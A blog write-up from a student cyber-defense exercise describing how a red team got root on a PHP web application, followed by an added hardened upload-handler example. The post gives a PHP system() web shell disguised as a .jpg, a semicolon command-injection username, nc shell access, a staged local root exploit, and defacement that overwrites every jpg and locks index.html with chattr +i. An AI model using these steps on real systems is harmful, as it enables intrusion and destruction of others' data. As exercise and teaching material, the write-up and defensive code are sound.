Friday, April 19, 2013

Student exercise web application - How we got Root over http


The steps we took to gain root access on a web application given as an inject are listed below. This method was used because the students were able to quickly fix the system exec commands located in the register page. The SQL injection was too tricky to try and write to disk with. Our phpMyAdmin method could not be used since the schools slowly figured out that they did not need it installed. We needed to get really creative with it. All of us contributed to this solution, which is a bit crazy but worked out for us.

  1. Obtained the actual VM and source code (yes, we needed an advantage, as the schools had this app for an entire day, so did we =P)
  2. Discovered multiple vulnerabilities in Register.php, Search.php, and Profile.php
  3. The logic for creating an account allowed us to write arbitrary files to disk.

      1. Create a username by the name of “Default” without quotes.
        • Create a php file with the following string <?php system($_GET["backup"])?>
        • Rename the php file with a .jpg extension to bypass the jpg file type restriction
        • Default.jpg, located in /avatars/, is used for every new user who signs up. It's a placeholder photo.
        • When the php file renamed to .jpg is uploaded, it overwrites the existing Default.jpg that resided on disk, because we created a username of Default.
        • Anytime you upload a file to the profile photo upload function, it is renamed to Profilename.jpg which allowed us to overwrite the default.jpg file.

      2. Create a username called “JimBob.php;” without quotes.
        • By adding a semicolon to the end of this username, the application copies the “Default.jpg” file with the php code we hid. The semicolon will rip off the .jpg extension, so you are now left with a file called JimBob.php.

  4. Access the php shell that we arbitrarily created by going to: http://app.school.net/avatars/JimBob.php?backup= YOUR COMMAND HERE
  5. Now that we had a command shell to execute commands, we needed to create an interactive shell, as if we were connected through SSH. The www-data user that Apache was running as did not have root privileges, and we were unable to easily escalate privileges to root.
  6. We created an interactive shell by using the profile photo upload function to upload files we needed to the server.
      1. We downloaded http://pentestmonkey.net/tools/web-shells/php-findsock-shell application and compiled the .c code on the same version of Ubuntu Linux
      2. We then uploaded two files, the php-findsock-shell.php file and findsock linux binary.
      3. In order to upload these files we still needed to rename each file with a .jpg extension.
      4. Each time we uploaded a file we used the JimBob.php file to rename the files we uploaded. These files needed to be uploaded by a normal username we created so they wouldn't overwrite our JimBob.php file.
      5. We renamed each file and moved them appropriately.
  7. Once the files were uploaded we could call our interactive Shell by using the following commands in our Bash terminal from any machine.
      1. $ nc -v app.schoolname.net 80
      2. GET /avatars/php-findsock-shell.php HTTP/1.0
      3. $ whoami
        • Output would be www-data and we now have interactive shell
  8. Escalate privileges to ROOT
      1. Since this application was running under an old version of Ubuntu, plenty of local root exploits were available, one of which, called wunderbar_emporiumv3, is very reliable.
      2. We had to compile the root exploit on our VM that we created with the same version of Ubuntu. The gcc/g++ compiler was not installed on the schools' VMs, so we could not compile anything on the host.
      3. After we compiled the exploit, we found the profile picture uploader was limited to 2mb files. Our exploit was around 4-5mb.
        • We bypassed this by splitting the exploit binary file into 3 pieces and uploading one piece at a time.
        • We then concatenated/appended each file together to put it back into one file through our interactive shell.
        • Chmod 777 on the file
        • ran the exploit with ./exploit
        • we now have ROOT!!! #
        • # whoami
        • # root
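As an added defensive example (not the exercise application's own code), this is how the avatar upload and account-creation logic from steps 3 and 4 could be written so that neither the “Default” username nor the “JimBob.php;” trick works. The directory path and the assumption that PHP execution is disabled in /avatars/ are mine, not from the post.

```php
<?php
// Added example (not the exercise application's code): a hardened avatar upload
// handler for the register/profile flow described above. Assumes avatars live
// in /var/www/app/avatars and the web server does not execute PHP there.
const AVATAR_DIR = '/var/www/app/avatars';
const RESERVED   = ['default'];   // shared placeholder, never user-writable
const MAX_BYTES  = 2 * 1024 * 1024;

// Whitelist letters, digits and underscore, 3-32 chars: rejects "JimBob.php;"
// outright and the "Default" name that aliases the placeholder image.
function validate_username(string $u): bool
{
    return preg_match('/^[A-Za-z0-9_]{3,32}$/', $u) === 1
        && !in_array(strtolower($u), RESERVED, true);
}

// $file is one entry of $_FILES. Returns the server-chosen file name to store
// in the user's database row; the username never becomes part of a path.
function store_avatar(string $username, array $file): string
{
    if (!validate_username($username)) throw new RuntimeException('bad username');
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload rejected');
    }
    // Check the content, not the client-supplied name or extension.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mime  = finfo_file($finfo, $file['tmp_name']);
    finfo_close($finfo);
    if ($mime !== 'image/jpeg') throw new RuntimeException('not a JPEG');
    // Re-encode through GD: a renamed PHP source file does not decode, and a
    // JPEG with PHP appended loses the trailing bytes when written out again.
    $img = @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) throw new RuntimeException('undecodable image');
    $name = bin2hex(random_bytes(16)) . '.jpg';   // random, never user-derived
    if (!imagejpeg($img, AVATAR_DIR . '/' . $name, 85)) throw new RuntimeException('write failed');
    imagedestroy($img);
    return $name;
}

// New accounts get their own copy of the placeholder via PHP's copy(), not via
// a shell command assembled from the username (which is what the ";" abused).
function new_user_avatar(): string
{
    $name = bin2hex(random_bytes(16)) . '.jpg';
    if (!copy(AVATAR_DIR . '/Default.jpg', AVATAR_DIR . '/' . $name)) throw new RuntimeException('copy failed');
    return $name;
}
```

Because the stored name is random and the username is only a database key, a user can no longer pick a file name that collides with Default.jpg or ends in .php, and the GD re-encode means even a valid JPEG with PHP appended is written back without the payload.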


  1. Since we are nice guys, we decided to deface their website, without destroying their entire application. We placed an index.html file with our awesome animated GIF file thanks to other team members. Index.html takes priority over index.php.
    1. The command chattr +i ./index.html was used to make it a pain to remove the file unless they were aware of that command. We forgot to put this on RMC, so RMC was able to remove theirs.
  2. We took a step further, and used the animated GIF file to overwrite every single jpg file that existed on the server with a simple BASH shell script to overwrite any file with the .jpg extension with our own.
